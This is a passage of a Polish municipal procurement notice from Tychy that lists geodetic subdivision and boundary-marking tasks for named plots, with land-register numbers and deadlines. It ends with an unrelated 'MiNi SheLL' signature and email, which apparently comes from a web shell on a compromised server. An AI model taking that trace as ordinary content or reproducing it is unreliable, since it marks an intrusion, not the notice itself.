- termin wykonania 6 miesięcy od daty podpisania umowy.
7. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Konwalii:
działka nr 148 o powierzchni 875 m2, KW KA1T/00010840/3, własność osoba fizyczna,
- podział zgodnie z istniejącym pasem drogowym (po ogrodzeniu działki),
- wykonanie projektu podziału w ilości 5 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.
8. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Żarnowiecka
a. działka nr 1210/28 o powierzchni 595 m2, KW 11975, własność osoba fizyczna,
b. działka nr 1213/28 o powierzchni 632 m2, KW 11975, własność osoba fizyczna,
c. działka nr 1676/32 o powierzchni 870 m2, KW KA1T/00037334/8, własność osoba fizyczna,
d. działka nr 1677/32 o powierzchni 944 m2, KW 3043, własność osoba fizyczna,
e. działka nr 1230/32 o powierzchni 393 m2, KW 12502, własność osoba fizyczna,
f. działka nr 1231/32 o powierzchni 760 m2, KW KA1T/00000060/8, własność osoba fizyczna.
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału dla każdej działki w ilości 4 egzemplarze plus ilość właścicieli,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.
9. Okazanie granic nieruchomości w celu przekazania w administrowanie MZUiM:
działki nr: 160, 161, 162 o łącznej powierzchni 236 m2, KW 10227, własność Gmina,
- okazanie granic nieruchomości w terenie,
- zawiadomienie MZUiM Tychy o terminie okazania granic,
- termin wykonania 2 miesiące od daty podpisania umowy.
10. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Leszczynowej:
a. działka nr 1325/41 o powierzchni 180 m2, KW nr 3444, własność osoba fizyczna,
b. działka nr 102/49 o powierzchni 868 m2, KW 7552, własność osoba fizyczna,
c. działka nr 133/49 o powierzchni 334 m2, KW 12159, własność osoba fizyczna,
d. działka nr 134/49 o powierzchni 867 m2, KW 12159, własność osoba fizyczna,
e. działka nr 135/63 o powierzchni 1260 m2, KW 12160, własność osoba fizyczna,
f. działka nr 804/41 o powierzchni 936 m2, KW 3816, własność osoba fizyczna,
g. działka nr 1809/41 o powierzchni 976 m2, KW 3756, własność osoba fizyczna,
h. działka nr 171/50 o powierzchni 661 m2, KW 13380, własność osoba fizyczna.
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału dla każdej działki w ilości 4 egzemplarzy plus ilość właścicieli,
- termin wykonania 6 miesięcy od daty podpisania umowy.
11. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów   zajętych pasem drogowym ul. Mąkołowskiej:
     działka nr 353/33 o powierzchni 1433 m2, KW KA1T/00000212/9, własność osoba fizyczna,
     - okazanie granic nieruchomości w terenie,
     - wykonanie projektu podziału w ilości 7 egzemplarzy,
     - stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział,
     - termin wykonania 6 miesięcy od daty podpisania umowy.
12. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Modrzewiowej:
a.	działka nr 922/41 o powierzchni 1610 m2, KW nr 11795, własność osoba fizyczna,
b.	działka nr 921/41 o powierzchni 1250 m2, KW nr 7579, własność osoba fizyczna,
c.	działka nr 1271/43 o powierzchni 498 m2, KW nr 2314, własność osoba fizyczna,
d.	działka nr 429/41 o powierzchni 1435 m2, KW nr 3240, własność osoba fizyczna,
e.	działka nr 428/41 o powierzchni 1123 m2, KW nr 3264, własność osoba fizyczna,
f.	działka nr 791/41 o powierzchni 1442 m2, KW nr 5908, własność osoba fizyczna,
g.	działka nr 1786/41 o powierzchni 2444 m2, KW nr 3444, własność osoba fizyczna,
h.	działka nr 1729/41 o powierzchni 927 m2, KW nr 30562, własność osoba fizyczna.
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału dla każdej działki w ilości 4 egzemplarzy plus ilość właścicieli,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1.	W trybie art. 96 ust. 1b w związku z art. 95 ust. 4 ustawy o gospodarce nieruchomościami:  
a.	Wykonanie projektu podziału nieruchomości położonej w Tychach przy ul. Poziomkowej, obejmującej działkę nr 2 170/17 o powierzchni 3 049 m2, KW KA1T/00005669/2, własność Gmina, w celu wydzielenia i pozostawienia na własność Gminy drogi dojazdowej do zespołu garaży sąsiadujących z przedmiotową działką. 
b.	Wykonanie projektu podziału nieruchomości położonej w Tychach przy ul. Jagiełły, obejmującej działkę nr 582/474 o powierzchni 3 043 m2, KW KA1T/00009850/6, własność Gmina, w celu wydzielenia działki do zwrotu.
c.	Wykonanie projektu podziału nieruchomości położonej w Tychach przy ul. Armii Krajowej, obejmującej działkę nr 1688/37 o powierzchni 10 353 m2, KW KA1T/00013435/2, własność Gmina, w celu wydzielenia działki do zwrotu.

2.	Namierzenie na mapie zasadniczej poszczególnych budynków wchodzących w skład kompleksu garaży położonych przy ulicy Rodakowskiego, na działce oznaczonej nr 2328/5 o powierzchni 3 633 m2.

Zamówienie musi zostać zrealizowane w terminie: 
- 6 tygodni od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 

Podział geodezyjny nieruchomości dla regulacji stanu prawnego w trybie art. 73 ustawy z dnia 13.10.1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. 98, Nr 133, poz. 872 z późn. zm.)- projekt podziału bez wstępnego projektu:
- działka nr 1069/42 o powierzchni 109 m2, KW KA1T/00011606/8, własność osoba fizyczna,
- podział zgodnie z istniejącym pasem drogowym (wzdłuż chodnika),
- wykonanie projektu podziału w ilości 6 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji przez Wojewodę Śląskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com